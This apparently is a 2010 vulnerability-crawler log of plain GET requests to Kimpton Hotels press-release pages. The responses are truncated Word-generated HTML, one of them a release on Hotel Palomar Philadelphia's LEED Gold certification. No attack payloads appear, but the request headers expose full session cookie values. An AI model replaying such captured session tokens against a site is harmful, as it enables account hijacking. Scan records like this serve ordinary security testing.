{mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l8 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l12 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {ms..
- /pdfs/press/html/Palomar-Philadelphia-LEED-0910/index.html

/pdfs/press/html/Palomar-Philadelphia-LEED-0910/index.html

http://www.kimptonhotels.com/pdfs/press/html/Palomar-Philadelphia-LEED-0910/index.html

Request

GET /pdfs/press/html/Palomar-Philadelphia-LEED-0910/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29286
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Datahref="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> Lucy MacNichol</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2010-09-13T20:43:00Z</o:LastPrinted> <o:Created>2010-09-13T20:44:00Z</o:Created> <o:LastSaved>2010-09-13T20:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1175</o:Words> <o:Characters>6698</o:Characters> <o:Lines>55</o:Lines> <o:Paragraphs>13</o:Paragraphs> <o:CharactersWithSpaces>8225</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> <w:LsdException Locked="true" Name="Normal"/> <w:LsdException Locked="true" Name="heading 1"/> <w:LsdException Locked="true" Name="heading 2"/> <w:LsdException Locked="true" Name="heading 3"/> <w:LsdException Locked="true" Name="heading 4"/> <w:LsdException Locked="true" Name="heading 5"/> <w:LsdException Locked="true" Name="heading 6"/> <w:LsdException Locked="true" Name="heading 7"/> <w:LsdException Locked="true" Name="heading 8"/> <w:LsdException Locked="true" Name="heading 9"/> <w:LsdException Locked="true" Name="toc 1"/> <w:LsdException Locked="true" Name="toc 2"/> <w:LsdException Locked="true" Name="toc 3"/> <w:LsdException Locked="true" Name="toc 4"/> <w:LsdException Locked="true" Name="toc 5"/> <w:LsdException Locked="true" Name="toc 6"/> <w:LsdException Locked="true" Name="toc 7"/> <w:LsdException Locked="true" Name="toc 8"/> <w:LsdException Locked="true" Name="toc 9"/> <w:LsdException Locked="true" Name="caption"/> <w:LsdException Locked="true" Name="Title"/> <w:LsdException Locked="true" Name="Subtitle"/> <w:LsdException Locked="true" Name="Strong"/> <w:LsdException Locked="true" Name="Emphasis"/> <w:LsdException Locked="true" Name="Table Grid"/> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h3 {mso-style-link:"Heading 3 Char"; mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:3; font-size:13.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; mso-style-link:"Comment Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}a:link, span.MsoHyperlink {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-link:"Comment Subject Char"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; mso-style-link:"Balloon Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0in; margin-right:0in; margin-bottom:0in; margin-left:.5in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.Heading3Char {mso-style-name:"Heading 3 Char"; mso-style-locked:yes; mso-style-link:"Heading 3"; mso-ansi-font-size:13.0pt; mso-bidi-font-size:13.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; font-weight:bold;}span.BalloonTextChar {mso-style-name:"Balloon Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Balloon Text"; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CommentTextChar {mso-style-name:"Comment Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Comment Text"; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.CommentSubjectChar {mso-style-name:"Comment Subject Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-parent:"Comment Text Char"; mso-style-link:"Comment Subject"; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal align=center style='text-align:center;line-height:150%'><spanstyle='font-family:Verdana;mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="Picture_x0020_0" o:spid="_x0000_i1025" type="#_x0000_t75" alt="Palomar Philadelphia Hotel Glow 1c Invert.jpg" style='width:237pt; height:111pt;visibility:visible'> <v:imagedata src="images/image001.jpg" o:title=""/> <v:textbox style='mso-rotate-with-shape:t'/></v:shape><![endif]--><![if !vml]><img width=239 height=113src="images/image002.gif"alt="Palomar Philadelphia Hotel Glow 1c Invert.jpg" v:shapes="Picture_x0020_0"><![endif]></span><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FORIMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><span style='mso-tab-count:1'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>Media Contacts:<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>Devine + Powers:<span style="mso-spacerun: yes">&nbsp; </span>LucyMacNichol<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'>215-568-2525 / </span><ahref="mailto:lmacnichol@devinepowers.com"><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>lmacnichol@devinepowers.com</span></a><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;color:black'> <o:p></o:p></span></p><h3 style='margin:0in;margin-bottom:.0001pt'><span style='font-size:11.0pt;color:black'>Kimpton Hotels &amp; Restaurants:<span style="mso-spacerun:yes">&nbsp; </span>Stacey Ellis<o:p></o:p></span></h3><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'> <o:p></o:p></span></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></i></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON ANDCITY OF PHILADELPHIA ANNOUNCE FIRST HOTEL AND RESTAURANT TO EARN LEED� CERTIFICATIONFROM THE <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>U.S. GREENBUILDING COUNCIL <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotel Palomar Philadelphia and <o:p></o:p></span></i></b></p><p class=MsoNormal align=center style='text-align:center;mso-list:none'><bstyle='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'>Square 1682 RestaurantCelebrate Gold <o:p></o:p></span></i></b></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>PHILADELPHIA, September 9, 2010 &#8211;</span></b><bstyle='mso-bidi-font-weight:normal'><span style='font-family:Arial;mso-bidi-font-family:Arial'> </span></b><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>Kimpton Hotels &amp; Restaurants, and theCity of Philadelphia, announce that one year after opening, Kimpton Hotel PalomarPhiladelphia and Square 1682 restaurant have been awarded LEED (Leadership inEnergy and Environmental Design) certification at the Gold level by the U.S.Green Building Council and verified by the Green Building CertificationInstitute (GBCI).<span style="mso-spacerun: yes">&nbsp; </span>LEED is thepreeminent program for the design, construction and operation ofhigh-performance green buildings.<span style="mso-spacerun: yes">&nbsp;</span>The milestone marks the first LEED-certified hotel and restaurant forKimpton and for Philadelphia. <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Thisachievement truly marks a milestone in Kimpton�s history and 29-year initiativeof sustainability,� said Mike Depatie, CEO at Kimpton Hotels &amp;Restaurants.<span style="mso-spacerun: yes">&nbsp; </span>�Since our founding,we have strived to lead the charge of environmental ch..
- /pdfs/press/html/Free-Spree-0710/

/pdfs/press/html/Free-Spree-0710/

http://www.kimptonhotels.com/pdfs/press/html/Free-Spree-0710/

Request

GET /pdfs/press/html/Free-Spree-0710/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Free-Spree-0710/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32032
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2010-07-12T16:49:00Z</o:LastPrinted> <o:Created>2010-07-12T16:50:00Z</o:Created> <o:LastSaved>2010-07-12T16:50:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>568</o:Words> <o:Characters>3242</o:Characters> <o:Lines>27</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>3981</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:77; mso-generic-font-family:modern; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:77; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; 